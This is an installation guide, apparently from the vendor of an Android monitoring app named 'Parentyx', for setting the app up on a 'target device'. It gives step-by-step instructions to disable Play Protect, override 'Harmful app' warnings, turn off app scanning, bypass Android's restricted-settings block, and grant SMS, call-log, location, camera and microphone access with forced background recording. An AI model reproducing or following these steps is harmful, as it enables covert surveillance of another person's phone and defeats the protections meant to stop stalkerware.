Installation Policy & Critical Guide

Mandatory instructions for correct installation. Failure to follow these steps may result in feature failure or account suspension.

⚠️ Strict Policy Warning

Our algorithm monitors service health. If permissions are deliberately disabled by the user after installation, your account may be Frozen or Disabled at any time. Refunds for paid limits will not be processed if services are inactive.

Mandatory: Disable Play Protect First

Before installing the application, you MUST go to the Google Play Store and disable "Play Protect". If this is not done, the operating system will uninstall the app automatically.

Login Activity: Initial Permissions

During the login process (Login Activity), the app will request runtime permissions. You must click "Allow" or "While using the app" for all requests:

  • Location (Precise)
  • SMS & Call Logs
  • Camera & Microphone

Child Activity: System Services

In the final setup screen (Child Activity), you will see a list of switches. You must tap each one and Enable the service in the Android Settings that open up.

ALL Must be Enabled (Green)

Critical Fix: Camera/Audio Recording

Attention:Android systems often block background recording even if permissions are given. To fix this, you must perform this specific action for the 'Parentyx' Accessibility Service.

The Action Sequence:

  1. Go to Settings > Accessibility > Installed Apps > Parentyx.
  2. Turn it OFF
  3. Wait 2 seconds
  4. Turn it ON again.

This resets the system flag allowing background usage.

Troubleshooting: 'Harmful App' / Disabled?

Play Protect might identify this app as "Harmful" because it monitors device activity. It may Disable the app automatically. You MUST check Play Protect settings to re-enable it.

  • Go to Play Store > Play Protect. Look for "Harmful apps disabled".
  • Tap on "Parentyx" or "Enable". If asked, select "Keep App (Unsafe)".
  • Finally: Turn OFF "Scan apps" and Go to Settings > Network > Auto-update > "Don't auto-update".

Android 13+ Setup: Restricted Settings

On Android 13, 14 & 15, enabling Accessibility is blocked by default ('Restricted Setting'). You must manually allow it from the App Info menu.

  1. 1
    Open 'App Info' for Parentyx
  2. 2
Tap the 3-dots menu (Top Right)
  3. 3
    Select Allow restricted settings

Refund Policy: Installation Responsibility

Please note: If the application is not installed correctly according to these instructions (including permissions & battery settings), NO REFUND will be issued. It is the user's responsibility to ensure the app is properly configured on the target device.
